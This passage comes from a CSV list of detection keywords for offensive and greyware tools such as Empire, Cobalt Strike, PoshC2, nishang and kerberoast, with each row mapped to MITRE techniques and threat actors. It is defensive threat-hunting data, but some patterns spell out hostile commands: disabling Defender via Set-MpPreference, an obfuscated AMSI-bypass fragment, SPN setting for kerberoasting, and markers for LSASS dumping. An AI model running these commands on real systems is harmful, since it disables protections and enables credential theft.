Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*Set-DCShadowPermissions*","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-DCShadowPermissions*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-DesktopACLToAllow*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-DomainObject*","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Seth by SySS GmbH*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*seth.py * -j 
INJECT*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*Seth-master.zip*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. 
Threat actors could run malicious code through the new + Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" +"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-MpPreference -DisableIOAVProtection $true*","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableRealtimeMonitoring $true*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableRealtimeMonitoring *true*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Set-MpPreference -DisableScriptScanning 1 *","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer 
Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setspn -A HTTP/*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setspn -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos 
implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setspn.exe -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Setting up GFlags & SilentProcessExit settings in registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*setup_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*seventeenman/CallBackDump*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*sfp_portscan_tcp.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*sfp_torexits.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*sftp *@*:* *","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data 